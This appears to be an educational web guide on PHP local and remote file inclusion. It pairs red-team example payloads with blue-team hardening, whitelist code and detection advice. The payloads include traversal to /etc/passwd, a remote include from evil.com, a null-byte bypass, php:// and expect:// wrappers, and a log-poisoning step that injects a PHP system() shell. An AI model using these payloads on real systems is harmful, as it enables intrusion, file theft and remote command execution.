LFI/RFI Security Awareness Guide

File Inclusion Vulnerabilities

File Inclusion vulnerabilities occur when applications improperly include files without proper validation. This guide explains the risks and defenses without providing executable exploit content.

Potential Impacts:

  • Sensitive data exposure
  • Application source code disclosure
  • System information leakage
  • Possible remote code execution

Red Team Vulnerabilities (Offensive)

1. Basic Local File Inclusion (LFI)

Basic LFI occurs when a web application includes files from the local server based on user input without proper validation, allowing attackers to read arbitrary files on the server.

Example Payload:

http://example.com/index.php?page=../../../../etc/passwd

Reads sensitive server files by traversing directories.

Common Techniques:

  • Directory traversal using ../ sequences
  • URL encoding to bypass filters
  • Null byte injection (in legacy PHP versions)

Typical Delivery Methods:

  • Malicious links in emails or forums
  • Automated scanners probing for LFI
  • Social engineering with crafted URLs

2. Basic Remote File Inclusion (RFI)

Basic RFI occurs when a web application includes external files specified via user input without proper validation, allowing attackers to execute remote code hosted on malicious servers.

Example Payload:

http://example.com/index.php?page=http://evil.com/malicious.txt

Includes and executes remote malicious files from an attacker-controlled server.

Common Techniques:

  • Using external URLs in include parameters
  • Bypassing filters with URL encoding or null byte injection
  • Abusing PHP wrappers like expect:// or php://input

Typical Delivery Methods:

  • Phishing links pointing to vulnerable endpoints
  • Injection via vulnerable web forms or parameters
  • Automated vulnerability scanners probing for RFI

3. Null Byte Injection

Null byte injection exploits vulnerabilities in applications—especially legacy PHP versions—by inserting a null character (%00) to prematurely terminate strings. This technique can bypass file extension checks or input validation, enabling attackers to manipulate file inclusion or path traversal.

Example Payload:

http://example.com/index.php?page=../../../../etc/passwd%00.php

Terminates the string early to bypass `.php` extension checks and include sensitive files.

Common Usage Scenarios:

  • Bypassing file extension whitelists in LFI or RFI vulnerabilities
  • Terminating strings to evade input validation filters
  • Combining with directory traversal for sensitive file access

Notes:

  • Mostly effective on older PHP versions; modern frameworks usually mitigate this.
  • Still relevant in poorly configured legacy applications.

4. File Inclusion via Protocol Wrappers

Protocol wrappers in PHP (like php:// or expect://) allow special handling of input/output streams. Attackers exploit vulnerable file inclusion parameters by using these wrappers to read, manipulate, or execute code on the server.

Example Payloads:

http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php

http://example.com/index.php?page=expect://id

Using wrappers to read source code or execute system commands.

Common Protocol Wrappers:

  • php://filter — Read and manipulate file contents (e.g., base64 encode)
  • php://input — Access raw POST data for injection
  • expect:// — Execute system commands (if enabled)
  • data:// — Inject data directly
  • zip:// — Access files inside zip archives

Mitigation:

  • Disable unnecessary PHP wrappers in configuration
  • Validate and whitelist input parameters strictly
  • Use secure coding practices avoiding dynamic file includes

5. Log Poisoning

Log poisoning involves injecting malicious code into server log files, which are then included by vulnerable file inclusion mechanisms (like LFI). This technique can lead to remote code execution by executing attacker-controlled code stored in the logs.

Attack Workflow:

# Step 1: Inject PHP code into logs via HTTP headers
User-Agent: <?php system($_GET['cmd']); ?>

# Step 2: Include poisoned log file via LFI
http://example.com/index.php?page=../../../../var/log/apache2/access.log&cmd=id

This allows execution of arbitrary commands on the server by accessing the poisoned log file.

Common Targets for Log Poisoning:

  • Apache and Nginx access or error logs
  • PHP error logs
  • Custom application logs writable by the web server

File Inclusion Tools & Automation

Discovery & Scanning

  • Burp Suite Scanner – Active scanning and detection of LFI/RFI vulnerabilities
  • ffuf – Fast web fuzzer useful for directory traversal and file inclusion discovery
  • gf Patterns – Custom patterns for LFI/RFI detection during fuzzing
  • Nuclei – Templates available for automated file inclusion vulnerability scanning
  • OWASP ZAP – Open-source scanner with file inclusion testing capabilities

Exploitation & Payload Generation

  • Burp Repeater – Manual payload crafting and injection for file inclusion tests
  • Commix – Automated tool focused on command injection, useful post file inclusion RCE
  • PHP wrappers payload collections – Prebuilt payloads using php://, expect://, data://
  • Custom scripts – For log poisoning and null byte injection exploitation

Post-Exploitation & Analysis

  • Burp Collaborator – Detect out-of-band interactions during exploitation
  • Wireshark/tcpdump – Network traffic capture and analysis post exploitation
  • Metasploit Framework – Post-exploitation modules after RCE via file inclusion
  • Log analyzers – Tools to inspect logs for evidence of successful injection or code execution

Blue Team Defensive Strategies

1. Secure Coding Practices

Whitelist Approach

// Safe file inclusion example
$allowed = ['home', 'about', 'contact'];
if (in_array($_GET['page'], $allowed)) {
    include($_GET['page'] . '.php');
}

Basename Protection

$file = basename($_GET['file']);
include('/templates/' . $file);

2. Server Configuration

PHP Hardening

; php.ini security settings
allow_url_fopen = Off
allow_url_include = Off
open_basedir = /var/www/html/

Web Server Restrictions

Configure server to prevent access outside web root

3. Monitoring & Detection

Attack Indicators

  • Multiple ../ sequences in requests
  • Attempts to access known sensitive files
  • PHP wrapper usage attempts

Response Actions

  • Log and block suspicious requests
  • Review application logs
  • Update input validation rules

Mitigation Strategies:

  • Never include files based on unvalidated user input
  • Use whitelists for allowed files/paths
  • Disable dangerous PHP functions and features
  • Configure open_basedir restrictions
  • Regularly audit file inclusion patterns
  • Implement proper file permissions

Educational Resources

Learning Materials

Defensive Guides

Legal Notice

This content is provided for educational purposes only. Never test security vulnerabilities against systems without explicit permission. Unauthorized testing may violate laws.